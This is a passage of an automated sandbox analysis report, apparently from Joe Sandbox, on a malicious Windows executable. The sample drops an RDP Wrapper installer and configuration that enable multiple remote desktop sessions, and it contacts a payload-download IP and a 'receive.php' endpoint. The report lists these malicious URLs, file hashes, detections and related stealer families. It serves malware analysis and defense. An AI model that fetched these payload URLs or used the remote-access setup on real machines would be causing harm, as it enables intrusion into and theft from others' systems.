Learning detection for dropped file 30->92 94 Uses netsh to modify the Windows network and firewall settings 30->94 96 3 other signatures 30->96 50 netsh.exe 2 30->50         started        52 net1.exe 1 36->52         started        54 net1.exe 1 40->54         started        56 net1.exe 1 44->56         started        58 net1.exe 1 46->58         started        signatures13 process14

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            hloRQZmlfg.exe63%ReversingLabsWin32.Adware.RedCap
                            hloRQZmlfg.exe72%VirustotalBrowse
                            hloRQZmlfg.exe100%AviraHEUR/AGEN.1311769
                            hloRQZmlfg.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\RDPWInst.exe100%Joe Sandbox ML
                            C:\Program Files\RDP Wrapper\rdpwrap.dll54%ReversingLabsWin64.PUA.RDPWrapper
                            C:\Program Files\RDP Wrapper\rdpwrap.dll57%VirustotalBrowse
                            C:\Users\user\AppData\Local\Temp\RDPWInst.exe68%ReversingLabsWin32.PUA.RDPWrap
                            C:\Users\user\AppData\Local\Temp\RDPWInst.exe78%VirustotalBrowse
                            C:\Windows\System32\rfxvmt.dll0%ReversingLabs
                            C:\Windows\System32\rfxvmt.dll0%VirustotalBrowse

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            SourceDetectionScannerLabelLink
                            hansgborn.eu0%VirustotalBrowse
                            api.ipify.org0%VirustotalBrowse

                            URLs

                            SourceDetectionScannerLabelLink
                            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                            http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                            http://upx.sf.net0%URL Reputationsafe
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                            http://stascorp.com/load/1-1-0-621%VirustotalBrowse
                            http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe23%VirustotalBrowse
                            http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
                            http://www.apache.org/licenses/0%VirustotalBrowse
                            https://github.com/lontivero/Open.Nat/issuesOAlso0%VirustotalBrowse
                            http://hansgborn.eu0%VirustotalBrowse
                            http://api.ipify.org/0%VirustotalBrowse
                            https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini2%VirustotalBrowse
                            https://hansgborn.eu/receive.php0%VirustotalBrowse
                            http://147.45.44.10421%VirustotalBrowse
                            https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU0%VirustotalBrowse
                            http://api.ipify.org0%VirustotalBrowse

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            hansgborn.eu
                            		188.114.96.3
                            		truefalseunknown
                            api.ipify.org
                            		104.26.12.205
                            		truefalseunknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exefalseunknown
                            http://api.ipify.org/falseunknown
                            https://hansgborn.eu/receive.phpfalseunknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://stascorp.com/load/1-1-0-62RDPWInst.exe, RDPWInst.exe, 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drfalseunknown
                            http://www.apache.org/licenses/LICENSE-2.0RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drfalseunknown
                            http://api.ipify.orgdhloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              http://stascorp.comDVarFileInfo$hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rdpwrap.dll.8.drfalse
                                		unknown
                                https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniURDPWInst.exe, 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drfalseunknown
                                http://hansgborn.euhloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                http://schemas.xmlsoap.org/soap/encoding/hloRQZmlfg.exe, 00000000.00000002.1920702414.00000000050F0000.00000004.08000000.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.apache.org/licenses/RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drfalseunknown
                                https://github.com/lontivero/Open.Nat/issuesOAlsohloRQZmlfg.exe, 00000000.00000002.1920702414.00000000050F0000.00000004.08000000.00040000.00000000.sdmpfalseunknown
                                http://schemas.xmlsoap.org/soap/envelope/hloRQZmlfg.exe, 00000000.00000002.1920702414.00000000050F0000.00000004.08000000.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniRDPWInst.exefalseunknown
                                https://hansgborn.eu/receive.phpdhloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://hansgborn.eudhloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://upx.sf.netAmcache.hve.38.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://147.45.44.104hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://hansgborn.euhloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://api.ipify.orghloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmpfalseunknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      104.26.12.205
                                      		api.ipify.orgUnited States
                                      		13335CLOUDFLARENETUSfalse
                                      239.255.255.250
                                      		unknownReserved
                                      		unknownunknownfalse
                                      8.46.123.33
                                      		unknownUnited States
                                      		62713AS-PUBMATICUStrue
                                      188.114.96.3
                                      		hansgborn.euEuropean Union
                                      		13335CLOUDFLARENETUSfalse
                                      147.45.44.104
                                      		unknownRussian Federation
                                      		2895FREE-NET-ASFREEnetEUfalse

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1528586
                                      Start date and time:2024-10-08 03:22:08 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 50s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:41
                                      Number of new started drivers analysed:3
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:hloRQZmlfg.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:cee4e023e6afaaa51f600caec3469215.exe
                                      Detection:MAL
                                      Classification:mal100.spre.troj.evad.winEXE@38/13@2/5
                                      EGA Information:
                                      • Successful, ratio: 50%
                                      HCA Information:
                                      • Successful, ratio: 99%
                                      • Number of executed functions: 104
                                      • Number of non-executed functions: 49
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.189.173.21
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target hloRQZmlfg.exe, PID 2444 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      21:23:51API Interceptor1x Sleep call for process: WerFault.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      104.26.12.205file.exeGet hashmaliciousRDPWrap ToolBrowse
                                      • api.ipify.org/
                                      file.exeGet hashmaliciousUnknownBrowse
                                      • api.ipify.org/
                                      file.exeGet hashmaliciousUnknownBrowse
                                      • api.ipify.org/
                                      file.exeGet hashmaliciousUnknownBrowse
                                      • api.ipify.org/
                                      file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                      • api.ipify.org/
                                      Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                      • api.ipify.org/
                                      2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                      • api.ipify.org/
                                      file.exeGet hashmaliciousUnknownBrowse
                                      • api.ipify.org/
                                      file.exeGet hashmaliciousUnknownBrowse
                                      • api.ipify.org/
                                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                      • api.ipify.org/
                                      239.255.255.250https://starylasfe.com.de/6SZZr/Get hashmaliciousHTMLPhisherBrowse
                                        https://Vv.ndlevesio.com/vrbU/Get hashmaliciousUnknownBrowse
                                          http://hans.uniformeslaamistad.com/yuop/66e6ea133c92f_crypted.exe#xinGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                            http://pay.christinagstewart.com/Get hashmaliciousUnknownBrowse
                                              http://hans.uniformeslaamistad.com/prog/66ce237125ba7_vjrew2ge.exeGet hashmaliciousUnknownBrowse
                                                Audio_Msg..00293614554893Transcript.htmlGet hashmaliciousUnknownBrowse
                                                  http://hans.uniformeslaamistad.com/prog/66f5db9e54794_vfkagks.exeGet hashmaliciousUnknownBrowse
                                                    http://xdr.euw31usea1-carbonhelixbytedandomaincontrolpanele-for-github.sentinelone.net/Get hashmaliciousUnknownBrowse
                                                      file.exeGet hashmaliciousCredential FlusherBrowse
                                                        RemittanceDetails(Rjackson)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          api.ipify.orgRef#0503711.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 172.67.74.152
                                                          8ID0109FLT24PO92CD-R.pdfGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.26.12.205
                                                          shipping.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 172.67.74.152
                                                          QUOTATIONS#08673.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 172.67.74.152
                                                          MAVI VATAN - VSL's DETAILS.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                          • 104.26.12.205
                                                          http://pub-6abf9f4f2e414af1a92f1d0cac9c1674.r2.dev/auth_gen.htmlGet hashmaliciousUnknownBrowse
                                                          • 172.67.74.152
                                                          New order.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.12.205
                                                          http://netflix.dittmedlemskap.com/Get hashmaliciousUnknownBrowse
                                                          • 172.67.74.152
                                                          DHL_Shipment_Details_8th_October.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          http://duttweilerangel6891-sidebarg165895-flarew256.pages.dev/help/contact/656749019228815Get hashmaliciousHTMLPhisherBrowse
                                                          • 172.67.74.152
                                                          hansgborn.eufile.exeGet hashmaliciousRDPWrap ToolBrowse
                                                          • 188.114.97.3
                                                          file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                          • 188.114.97.3
                                                          file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                          • 188.114.97.3
                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                          • 188.114.97.3
                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                          • 188.114.96.3
                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                          • 188.114.97.3
                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                          • 188.114.96.3
                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                          • 188.114.96.3
                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                          • 188.114.96.3
                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                          • 188.114.97.3

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.206.204
                                                          https://starylasfe.com.de/6SZZr/Get hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          2ngxhElaud.exeGet hashmaliciousXmrigBrowse
                                                          • 172.67.173.168
                                                          copyright_infringement_evidence_1.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.158.129
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.206.204
                                                          Copyright_Infringement_Evidence.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.158.129
                                                          ArT23Ix6Ox.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.159.186
                                                          cqKYl7T4CR.exeGet hashmaliciousUnknownBrowse
                                                          • 104.21.9.92
                                                          ArT23Ix6Ox.exeGet hashmaliciousUnknownBrowse
                                                          • 104.21.9.92
                                                          cqKYl7T4CR.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.159.186
                                                          FREE-NET-ASFREEnetEUT2bmenoX1o.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 147.45.44.104
                                                          http://hans.uniformeslaamistad.com/yuop/66e6ea133c92f_crypted.exe#xinGet hashmaliciousPureLog Stealer, RedLine, zgRATBrowse
                                                          • 147.45.44.104
                                                          http://hans.uniformeslaamistad.com/prog/66ce237125ba7_vjrew2ge.exeGet hashmaliciousUnknownBrowse
                                                          • 147.45.44.104
                                                          http://hans.uniformeslaamistad.com/prog/66f5db9e54794_vfkagks.exeGet hashmaliciousUnknownBrowse
                                                          • 147.45.44.104
                                                          T8TY28UxiT.dllGet hashmaliciousUnknownBrowse
                                                          • 147.45.116.5
                                                          T8TY28UxiT.dllGet hashmaliciousUnknownBrowse
                                                          • 147.45.116.5
                                                          Q0cWJo6Jvh.exeGet hashmaliciousUnknownBrowse
                                                          • 147.45.116.5
                                                          Q0cWJo6Jvh.exeGet hashmaliciousUnknownBrowse
                                                          • 147.45.116.5
                                                          lihZ6gUU7V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                          • 147.45.44.104
                                                          Bn7LPdQA1s.exeGet hashmaliciousLummaC, VidarBrowse
                                                          • 147.45.44.104
                                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.206.204
                                                          https://starylasfe.com.de/6SZZr/Get hashmaliciousHTMLPhisherBrowse
                                                          • 104.17.25.14
                                                          2ngxhElaud.exeGet hashmaliciousXmrigBrowse
                                                          • 172.67.173.168
                                                          copyright_infringement_evidence_1.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.158.129
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 172.67.206.204
                                                          Copyright_Infringement_Evidence.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.158.129
                                                          ArT23Ix6Ox.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.159.186
                                                          cqKYl7T4CR.exeGet hashmaliciousUnknownBrowse
                                                          • 104.21.9.92
                                                          ArT23Ix6Ox.exeGet hashmaliciousUnknownBrowse
                                                          • 104.21.9.92
                                                          cqKYl7T4CR.exeGet hashmaliciousUnknownBrowse
                                                          • 172.67.159.186
                                                          AS-PUBMATICUSDocuSign-Docx.pdfGet hashmaliciousUnknownBrowse
                                                          • 185.64.189.112
                                                          https://issuu.com/smart_media/docs/die_welt_wirtschaft/19Get hashmaliciousUnknownBrowse
                                                          • 198.47.127.18
                                                          https://coisunibaseaiusignin.gitbook.io/Get hashmaliciousHTMLPhisherBrowse
                                                          • 185.64.191.210
                                                          http://uppholldbcloginn.gitbook.io/us/Get hashmaliciousHTMLPhisherBrowse
                                                          • 198.47.127.205
                                                          http://geminislogins.gitbook.io/us/Get hashmaliciousHTMLPhisherBrowse
                                                          • 185.64.191.210
                                                          Farahexperiences.com_Report_52288.pdfGet hashmaliciousUnknownBrowse
                                                          • 185.64.189.112
                                                          http://emaildlatt-mailcom-28e2uy93.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                          • 198.47.127.18
                                                          http://coinbassewalletextensin.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                          • 185.64.191.210
                                                          https://metamaseiklogin.gitbook.io/Get hashmaliciousHTMLPhisherBrowse
                                                          • 185.64.191.210
                                                          https://mmetmask-login.gitbook.io/Get hashmaliciousHTMLPhisherBrowse
                                                          • 185.64.191.210

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0e2ngxhElaud.exeGet hashmaliciousXmrigBrowse
                                                          • 188.114.96.3
                                                          https://Vv.ndlevesio.com/vrbU/Get hashmaliciousUnknownBrowse
                                                          • 188.114.96.3
                                                          x2Yi9Hr77a.exeGet hashmaliciousXWormBrowse
                                                          • 188.114.96.3
                                                          file.exeGet hashmaliciousXmrigBrowse
                                                          • 188.114.96.3
                                                          http://hans.uniformeslaamistad.com/prog/66f5db9e54794_vfkagks.exeGet hashmaliciousUnknownBrowse
                                                          • 188.114.96.3
                                                          STlUEqhwpx.exeGet hashmaliciousQuasarBrowse
                                                          • 188.114.96.3
                                                          EUYIlr7uUX.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.96.3
                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                          • 188.114.96.3
                                                          T6l6gPxwQU.exeGet hashmaliciousUnknownBrowse
                                                          • 188.114.96.3
                                                          https://mailstat.us/tr/t/5w8u1qwlwl61e4h/1/https:/krediti.ca/#Y2FyYS5jJGNiZmxvb3JzaW5jLmNvbQ==Get hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                          • 188.114.96.3

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Program Files\RDP Wrapper\rdpwrap.dllfile.exeGet hashmaliciousRDPWrap ToolBrowse
                                                            file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                              file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                  file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                    file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                                      file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                        file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                                            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse

                                                                              Created / dropped Files

                                                                              C:\Program Files\RDP Wrapper\rdpwrap.dll

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):116736
                                                                              Entropy (8bit):5.884975745255681
                                                                              Encrypted:false
                                                                              SSDEEP:3072:m3zxbyHM+TstVfFyov7je9LBMMmMJDOvYYVs:oMjTiVw2ve9LBMMpJsT
                                                                              MD5:461ADE40B800AE80A40985594E1AC236
                                                                              SHA1:B3892EEF846C044A2B0785D54A432B3E93A968C8
                                                                              SHA-256:798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                                                                              SHA-512:421F9060C4B61FA6F4074508602A2639209032FD5DF5BFC702A159E3BAD5479684CCB3F6E02F3E38FB8DB53839CF3F41FE58A3ACAD6EC1199A48DC333B2D8A26
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 54%
                                                                              • Antivirus: Virustotal, Detection: 57%, Browse
                                                                              Joe Sandbox View:
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.rB/.!B/.!B/.!.~.!j/.!.~.!&/.!.~3!H/.!..'!G/.!B/.!./.!O}.!F/.!O}0!C/.!O}7!C/.!O}2!C/.!RichB/.!................PE..d...Z..T.........." .................Q....................................... ............`.........................................0...l.......<...................................................................`...p............ ...............................text............................... ..`.rdata..<.... ......................@..@.data....=..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

                                                                              C:\Program Files\RDP Wrapper\rdpwrap.ini

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                              File Type:Generic INItialization configuration [SLPolicy]
                                                                              Category:dropped
                                                                              Size (bytes):443552
                                                                              Entropy (8bit):5.4496544667416975
                                                                              Encrypted:false
                                                                              SSDEEP:768:DUoDQVQpXQq4WDi9SUnpB8fbQnxJcy8RMFdKKb8x8Rr/d6gl/+f8jZ0ftlFn4m7Y:TJGYS33L+MUIiG4IvREWddadl/Fy/k9c
                                                                              MD5:92BC5FEDB559357AA69D516A628F45DC
                                                                              SHA1:6468A9FA0271724E70243EAB49D200F457D3D554
                                                                              SHA-256:85CD5CD634FA8BBBF8D71B0A7D49A58870EF760DA6D6E7789452CAE4CAB28127
                                                                              SHA-512:87E210E22631C1A394918859213140A7C54B75AEC9BBC4F44509959D15CFA14ABCBFEB1ADF9CFFA11B2E88F84A8708F67E842D859E63394B7F6036CE934C3CC9
                                                                              Malicious:false
                                                                              Preview:; RDP Wrapper Library configuration..; Do not modify without special knowledge..; Edited by sebaxakerhtc....[Main]..Updated=2024-09-25..LogFile=\rdpwrap.txt..SLPolicyHookNT60=1..SLPolicyHookNT61=1....[SLPolicy]..TerminalServices-RemoteConnectionManager-AllowRemoteConnections=1..TerminalServices-RemoteConnectionManager-AllowMultipleSessions=1..TerminalServices-RemoteConnectionManager-AllowAppServerMode=1..TerminalServices-RemoteConnectionManager-AllowMultimon=1..TerminalServices-RemoteConnectionManager-MaxUserSessions=0..TerminalServices-RemoteConnectionManager-ce0ad219-4670-4988-98fb-89b14c2f072b-MaxSessions=0..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-MaxSessions=2..TerminalServices-RDP-7-Advanced-Compression-Allowed=1..TerminalServices-RemoteConnectionManager-45344fe7-00e6-4ac6-9f01-d01fd4ffadfb-LocalOnly=0..TerminalServices-RemoteConnectionManager-8dc86f1d-9969-4379-91c1-06fe1dc60575-MaxSessions=1000..TerminalServices-DeviceRedirection-Licenses-TS

                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_hloRQZmlfg.exe_e14f1ae934bde6c6503b1e1bfaf2ffefa86c324_8c8de2e2_89409a0e-f3ad-4606-acec-29704ed3c812\Report.wer

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):1.3840373093637786
                                                                              Encrypted:false
                                                                              SSDEEP:192:Dr0fZbf0BU/KaGwOpsMLmdzuiFYZ24IO8S:/0fZwBU/KaySMSdzuiFYY4IO8S
                                                                              MD5:C557E311E2DE95A575477C498BA9AD12
                                                                              SHA1:8942E4F3747DC39DB0959D5AFD1252F87877C1A8
                                                                              SHA-256:2E924038991D81C873776C3A9C6DAB5FD94EA3D60E24415C63271CAE6196C3EE
                                                                              SHA-512:796FCC9E32B37166AE92B17FC710CEFD418B2218949B0FF9373E8D0714F3DE4448332BD3B6114CF955F9F8AF74EE6FAEB93ADB317D4E368E1DFB05166D01D3AB
                                                                              Malicious:true
                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.2.4.2.2.3.9.1.1.3.0.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.2.4.2.2.5.2.0.8.1.8.4.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.9.4.0.9.a.0.e.-.f.3.a.d.-.4.6.0.6.-.a.c.e.c.-.2.9.7.0.4.e.d.3.c.8.1.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.b.9.5.2.6.c.0.-.f.9.b.0.-.4.4.d.5.-.b.7.f.b.-.1.e.e.1.f.6.8.7.7.3.e.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.h.l.o.R.Q.Z.m.l.f.g...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.D.P.C.r.e.a.t.o.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.8.c.-.0.0.0.1.-.0.0.1.4.-.b.f.0.4.-.0.9.9.e.2.0.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.a.5.d.9.2.d.4.1.7.9.1.6.5.b.c.0.8.1.7.f.d.a.7.2.e.7.5.7.5.b.c.0.0.0.0.0.0.0.0.!.0.0.0.0.b.f.2.c.e.f.f.1.f.1.9.f.0.9.a.7.0.8.6.3.d.1.f.8.c.7.b.e.0.f.a.9.6.6.

                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER91CD.tmp.dmp

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:Mini DuMP crash report, 15 streams, Tue Oct 8 01:23:44 2024, 0x1205a4 type
                                                                              Category:dropped
                                                                              Size (bytes):385976
                                                                              Entropy (8bit):3.362067021584867
                                                                              Encrypted:false
                                                                              SSDEEP:6144:RebYc4AyUsSrjTgTyrGuVwm0j/TknLIe:RiYIQSrjTmuVwrj/Tkn8e
                                                                              MD5:0A6687B45E85F7A0CDCE28AB7018ADEB
                                                                              SHA1:BD857779DEE2B40E4D6ECDE60A08E4650455F9B8
                                                                              SHA-256:FC484CA4F873C983E2A2EB280D1F50CE29CF609EEBEFEB261BEEC22B0EAD4B9C
                                                                              SHA-512:5B063E6AED2B9BB004461797CD30EE54287E7417526E1845C3E0E9FD6021C2A9285129377225784B9852ACE44A46768E1E4280264E5B621102A9D268BE0A8FD7
                                                                              Malicious:false
